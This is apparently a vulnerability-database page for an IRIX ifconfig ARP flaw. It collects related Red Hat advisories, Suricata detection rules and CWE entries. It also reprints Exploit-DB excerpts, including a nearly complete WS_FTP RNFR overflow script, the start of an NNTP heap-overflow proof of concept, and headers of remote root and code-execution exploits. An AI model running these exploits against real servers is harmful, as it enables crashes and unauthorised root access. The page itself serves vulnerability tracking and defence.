CVE-2004-2001
published 2004-05-05CVE-2004-2001: ifconfig "-arp" in SGI IRIX 6.5 through 6.5.22m does not properly disable ARP requests from being sent or received.
PriorityP410medium4.6CVSS 2.0
AVLACLAuNCPIPAP
EPSS
0.32%
24.3th percentile
ifconfig "-arp" in SGI IRIX 6.5 through 6.5.22m does not properly disable ARP requests from being sent or received.
Affected
28 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
CVSS provenance
nvdv2.04.6MEDIUMAV:L/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat9.3CRITICAL
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-rw56-gxm9-c6gm: ifconfig "-arp" in SGI IRIX 6
ghsa_unreviewed·2022-05-03
CVE-2004-2001 [MEDIUM] GHSA-rw56-gxm9-c6gm: ifconfig "-arp" in SGI IRIX 6
ifconfig "-arp" in SGI IRIX 6.5 through 6.5.22m does not properly disable ARP requests from being sent or received.
Red Hat
namazu XSS flaw
vendor_redhat·CVSS 7.5
CVE-2008-1468 [HIGH] namazu XSS flaw
namazu XSS flaw
Cross-site scripting (XSS) vulnerability in namazu.cgi in Namazu before 2.0.18 allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded input, related to failure to set the charset, a different vector than CVE-2004-1318 and CVE-2001-1350. NOTE: some of these details are obtained from third party information.
Red Hat
CVE-2006-1017: The c-client library 2000, 2001, or 2004 for PHP before 4
vendor_redhat·CVSS 9.3
CVE-2006-1017 [CRITICAL] CVE-2006-1017: The c-client library 2000, 2001, or 2004 for PHP before 4
The c-client library 2000, 2001, or 2004 for PHP before 4.4.4 and 5.x before 5.1.5 do not check the (1) safe_mode or (2) open_basedir functions, and when used in applications that accept user-controlled input for the mailbox argument to the imap_open function, allow remote attackers to obtain access to an IMAP stream data structure and conduct unauthorized IMAP actions.
Statement: We do not consider safe_mode / open_basedir restriction bypass issues being security sensitive. For more details see http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=169857#c1 and http://www.php.net/security-note.php
Suricata
GPL FTP MDTM overflow attempt
suricata·2010-09-23
CVE-2001-1021 GPL FTP MDTM overflow attempt
GPL FTP MDTM overflow attempt
Rule: alert ftp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL FTP MDTM overflow attempt"; flow:established,to_server; content:"MDTM"; nocase; isdataat:100,relative; pcre:"/^MDTM\s[^\n]{100}/smi"; reference:bugtraq,9751; reference:cve,2001-1021; reference:cve,2004-0330; reference:nessus,12080; classtype:attempted-admin; sid:2102546; rev:8; metadata:created_at 2010_09_23, cve CVE_2001_1021, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
GPL FTP invalid MDTM command attempt
suricata·2010-09-23
CVE-2001-1021 GPL FTP invalid MDTM command attempt
GPL FTP invalid MDTM command attempt
Rule: alert ftp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL FTP invalid MDTM command attempt"; flow:established,to_server; content:"MDTM"; fast_pattern; nocase; pcre:"/^MDTM \d+[-+]\D/smi"; reference:bugtraq,9751; reference:cve,2001-1021; reference:cve,2004-0330; classtype:attempted-admin; sid:2102416; rev:9; metadata:created_at 2010_09_23, cve CVE_2001_1021, signature_severity Unknown, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Exploit-DB
eXtremail 1.x/2.1 - Remote Format String (3)
exploitdb·2006-10-06
CVE-2001-1078 eXtremail 1.x/2.1 - Remote Format String (3)
eXtremail 1.x/2.1 - Remote Format String (3)
---
source: https://www.securityfocus.com/bid/2908/info
eXtremail is a freeware SMTP server available for Linux and AIX.
eXtremail contains a format-string vulnerability in its logging mechanism. Attackers can send SMTP commands argumented with maliciously constructed arguments that will exploit this vulnerability.
eXtremail runs with root privileges. By exploiting this vulnerability, remote attackers can gain superuser access on the underlying host and can crash eXtremail. If the system is not restarted automatically, a denial of SMTP service will result.
UPDATE (April 26, 2004): Reportedly, this vulnerability has been reintroduced into the new version (1.5.9) of eXtremail.
UPDATE (October 26, 2007): Reports indicate that the 'USER' comm
Exploit-DB
Solaris 2.5.1/2.6/7/8 rlogin (SPARC) - '/bin/login' Remote Buffer Overflow
exploitdb·2004-12-24·CVSS 10.0
CVE-2001-0797 [CRITICAL] Solaris 2.5.1/2.6/7/8 rlogin (SPARC) - '/bin/login' Remote Buffer Overflow
Solaris 2.5.1/2.6/7/8 rlogin (SPARC) - '/bin/login' Remote Buffer Overflow
---
/*
* $Id: raptor_rlogin.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
*
* raptor_rlogin.c - (r)login, Solaris/SPARC 2.5.1/2.6/7/8
* Copyright (c) 2004 Marco Ivaldi
*
* Buffer overflow in login in various System V based operating systems
* allows remote attackers to execute arbitrary commands via a large number
* of arguments through services such as telnet and rlogin (CVE-2001-0797).
*
* Dedicated to my beautiful croatian ladies (hello Zrinka!) -- August 2004
*
* This remote root exploit uses the (old) System V based /bin/login
* vulnerability via the rlogin attack vector, returning into the .bss
* section to effectively bypass the non-executable stack protection
* (noexec_user_stack=1 in /etc/system).
*
* Many tha
Exploit-DB
Ipswitch WS_FTP Server 5.03 - 'RNFR' Buffer Overflow
exploitdb·2004-11-29
CVE-2001-1021 Ipswitch WS_FTP Server 5.03 - 'RNFR' Buffer Overflow
Ipswitch WS_FTP Server 5.03 - 'RNFR' Buffer Overflow
---
#===== Start WS_FTP_Overflow.pl =====
#
# Usage: WS_FTP_Overflow.pl
# WS_FTP_Overflow.pl 127.0.0.1 hello moto
#
# WS_FTP Server Version 5.03, 2004.10.14
#
# Download:
# http://www.ipswitch.com/
#
######################################################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "21",
Proto => "TCP"))
{
print "Attempting to kill WS_FTP Server service at $ARGV[0]:21...";
sleep(1);
print $socket "USER $ARGV[1]\r\n";
sleep(1);
print $socket "PASS $ARGV[2]\r\n";
sleep(1);
print $socket "PORT 127,0,0,1,18,12\r\n";
sleep(1);
print $socket "RNFR " . "A" x 768 . "\r\n";
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:21\n";
}
#====
Exploit-DB
Ability Server 2.34 - FTP 'STOR' Remote Buffer Overflow
exploitdb·2004-10-21
CVE-2004-1626 Ability Server 2.34 - FTP 'STOR' Remote Buffer Overflow
Ability Server 2.34 - FTP 'STOR' Remote Buffer Overflow
---
###################################
# Ability Server 2.34 FTP STOR Buffer Overflow #
# Advanced, secure and easy to use FTP Server. #
# 21 Oct 2004 - muts #
###################################
# D:\BO>ability-2.34-ftp-stor.py #
###################################
# D:\data\tools>nc -v 127.0.0.1 4444 #
# localhost [127.0.0.1] 4444 (?) open #
# Microsoft Windows XP [Version 5.1.2600] #
# (C) Copyright 1985-2001 Microsoft Corp. #
# D:\Program Files\abilitywebserver> #
###################################
import ftplib
from ftplib import FTP
import struct
print "\n\n################################"
print "\nAbility Server 2.34 FTP STOR buffer Overflow"
print "\nFound & coded by muts [at] whitehat.co.il"
print "\nFor Educational Pur
Exploit-DB
Microsoft Windows NNTP Service (XPAT) - Denial of Service (MS04-036)
exploitdb·2004-10-16
CVE-2004-0574 Microsoft Windows NNTP Service (XPAT) - Denial of Service (MS04-036)
Microsoft Windows NNTP Service (XPAT) - Denial of Service (MS04-036)
---
#--
# IIS NNTP Service XPAT command heap overflow proof of concept
#
# Author:
# Lucas Lavarello (lucas at coresecurity dot com)
# Juliano Rizzo (juliano at coresecurity dot com)
#
# Copyright (c) 2001-2004 CORE Security Technologies, CORE SDI Inc.
# All rights reserved.
#
# THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR
# CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF
# THIS SOFTWARE
#
# www coresecurity com
#--
from socket import *
host = "127.0.0.1"
pat = "C"*1946 + " " + "X"*10
newsgroup = "control.newgroup"
sock = socket(AF_INET, SOCK_STREAM)
sock.con
Exploit-DB
Icecast 2.0.1 (Win32) - Remote Code Execution (1)
exploitdb·2004-10-06
CVE-2004-1561 Icecast 2.0.1 (Win32) - Remote Code Execution (1)
Icecast 2.0.1 (Win32) - Remote Code Execution (1)
---
/*
by Luigi Auriemma
Shellcode add-on by Delikon
www.Delikon.de
Because of all the forbidden bytes in a http get request
i had to use a very small shellcode, which was blown up
by Msf::Encoder::PexAlphaNum. Great encoder.
C:>iceexec 127.0.0.1
Icecast nc 127.0.0.1 9999
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:Icecast2 Win32>
*/
#include
#include
#include
#ifdef WIN32
#pragma comment(lib, "ws2_32.lib")
#include
#include "winerr.h"
#define close closesocket
#else
#include
#include
#include
#include
#include
#include
#endif
#define VER "0.1"
#define PORT 8000
#define BUFFSZ2048
#define TIMEOUT 3
#define EXEC"GET / HTTP/1.0rn"
"arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn"
"arn" "arn" "a
Exploit-DB
eXtremail 1.x/2.1 - Remote Format String (2)
exploitdb·2001-06-21
CVE-2001-1078 eXtremail 1.x/2.1 - Remote Format String (2)
eXtremail 1.x/2.1 - Remote Format String (2)
---
// source: https://www.securityfocus.com/bid/2908/info
eXtremail is a freeware SMTP server available for Linux and AIX.
eXtremail contains a format-string vulnerability in its logging mechanism. Attackers can send SMTP commands argumented with maliciously constructed arguments that will exploit this vulnerability.
eXtremail runs with root privileges. By exploiting this vulnerability, remote attackers can gain superuser access on the underlying host and can crash eXtremail. If the system is not restarted automatically, a denial of SMTP service will result.
UPDATE (April 26, 2004): Reportedly, this vulnerability has been reintroduced into the new version (1.5.9) of eXtremail.
UPDATE (October 26, 2007): Reports indicate that the 'USER' c
Exploit-DB
eXtremail 1.x/2.1 - Remote Format String (1)
exploitdb·2001-06-21
CVE-2001-1078 eXtremail 1.x/2.1 - Remote Format String (1)
eXtremail 1.x/2.1 - Remote Format String (1)
---
// source: https://www.securityfocus.com/bid/2908/info
eXtremail is a freeware SMTP server available for Linux and AIX.
eXtremail contains a format-string vulnerability in its logging mechanism. Attackers can send SMTP commands argumented with maliciously constructed arguments that will exploit this vulnerability.
eXtremail runs with root privileges. By exploiting this vulnerability, remote attackers can gain superuser access on the underlying host and can crash eXtremail. If the system is not restarted automatically, a denial of SMTP service will result.
UPDATE (April 26, 2004): Reportedly, this vulnerability has been reintroduced into the new version (1.5.9) of eXtremail.
UPDATE (October 26, 2007): Reports indicate that the 'USER' c
No writeups or analysis indexed.
CWE
Path Equivalence: 'filename/' (Trailing Slash)
mitre_cwe·CVSS 5.0
[MEDIUM] CWE-49 Path Equivalence: 'filename/' (Trailing Slash)
CWE-49: Path Equivalence: 'filename/' (Trailing Slash)
The product accepts path input in the form of trailing slash ('filedir/') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.
Modes of Introduction:
Phase: Implementation
Phase: Operation
Common Consequences:
Scope: Confidentiality, Integrity. Impact: Read Files or Directories, Modify Files or Directories.
Observed Examples:
CVE-2002-0253: Overlaps infoleak
CVE-2001-0446: Application server allows remote attackers to read source code for .jsp files by appending a / to the requested URL.
CVE-2004-0334: Bypass Basic Authentication for files using trailing "/"
CVE-2001-0893: Read sensitive files with trailing "/
CWE
Path Equivalence: 'filename ' (Trailing Space)
mitre_cwe·CVSS 5.0
[MEDIUM] CWE-46 Path Equivalence: 'filename ' (Trailing Space)
CWE-46: Path Equivalence: 'filename ' (Trailing Space)
The product accepts path input in the form of trailing space ('filedir ') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.
Modes of Introduction:
Phase: Implementation
Common Consequences:
Scope: Confidentiality, Integrity. Impact: Read Files or Directories, Modify Files or Directories.
Observed Examples:
CVE-2001-0693: Source disclosure via trailing encoded space "%20"
CVE-2001-0778: Source disclosure via trailing encoded space "%20"
CVE-2001-1248: Source disclosure via trailing encoded space "%20"
CVE-2004-0280: Source disclosure via trailing encoded space "%20"
CVE-2004-2213: Source disclosure via trail
2004-05-05
Published